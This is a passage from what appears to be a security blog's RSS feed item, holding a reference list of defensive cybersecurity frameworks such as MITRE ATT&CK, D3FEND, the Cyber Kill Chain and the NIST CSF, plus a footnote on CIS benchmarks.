Cynefin is a framework for understanding what kind of problem space you are in to guide decision-making and action. It was created by David Snowden and takes its name from the Welsh word meaning &#8220;the place of your multiple belongings.&#8221;, <a href="https://cynefin.io/wiki/Cynefin?ref=quasarops.com">https://cynefin.io/wiki/Cynefin</a></p></li><li><p>Alex S. Wilner (2011) Deterring the Undeterrable: Coercion, Denial, and Delegitimization in Counterterrorism, The Journal of Strategic Studies, 34:1, 3-37, DOI: 10.1080/01402390.2011.541760, <a href="https://doi.org/10.1080/01402390.2011.541760?ref=quasarops.com">https://doi.org/10.1080/01402390.2011.541760</a></p></li><li><p>MITRE ENGAGE, a framework for planning and discussing adversary engagement operations, <a href="https://engage.mitre.org/?ref=quasarops.com">https://engage.mitre.org/</a></p></li><li><p>MITRE ATT&amp;CK, a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations, <a href="https://attack.mitre.org/?ref=quasarops.com">https://attack.mitre.org/</a></p></li><li><p>MITRE ATTACK FLOW, a data model with supporting tooling and examples for describing sequences of adversary behaviors. Attack flows help defenders understand, share, and make threat-informed decisions based on the sequence of actions in a cyber-attack., <a href="https://ctid.mitre-engenuity.org/our-work/attack-flow/?ref=quasarops.com">https://ctid.mitre-engenuity.org/our-work/attack-flow/</a></p></li><li><p>MITRE D3FEND, a knowledge graph of cybersecurity countermeasures, <a href="https://d3fend.mitre.org/?ref=quasarops.com">https://d3fend.mitre.org/</a></p></li><li><p>Cyber Kill Chain, a model for identification and prevention of cyber intrusions activity, <a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html?ref=quasarops.com">https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html</a></p></li><li><p>NIST, a framework that offers a set of guidelines and best practices for managing cybersecurity risks in organizations, the framework provides a common language and a structured approach for organizations to identify, assess, and manage cybersecurity risks in a consistent and repeatable way, <a href="https://www.nist.gov/cyberframework?ref=quasarops.com">https://www.nist.gov/cyberframework</a></p></li><li><p>Cyber Threat Framework, the Cyber Threat Framework was developed by the US Government to enable consistent characterization and categorization of cyber threat events, and to identify trends or changes in the activities of cyber adversaries, <a href="https://www.dni.gov/index.php/cyber-threat-framework?ref=quasarops.com">https://www.dni.gov/index.php/cyber-threat-framework</a></p></li></ul><div><hr></div><ol><li><p>As per <a href="https://learn.microsoft.com/en-us/compliance/regulatory/offering-cis-benchmark?ref=quasarops.com">Microsoft Learn</a>: &#8220;<a href="https://www.cisecurity.org/cis-benchmarks/?ref=quasarops.com">CIS benchmarks</a> are configuration baselines and best practices for securely configuring a system. Each of the guidance recommendations references one or more <a href="https://www.cisecurity.org/controls/?ref=quasarops.com">CIS controls</a> that were developed to help organizations improve their cyberdefense capabilities. CIS controls map to many established standards and regulatory frameworks, including the NIST Cybersecurity Framework (CSF) and NIST SP 800-53, the ISO 27000 series of standards, PCI DSS, HIPAA, and others.&#8221;</p></li></ol>]]></content:encoded></item></channel></rss>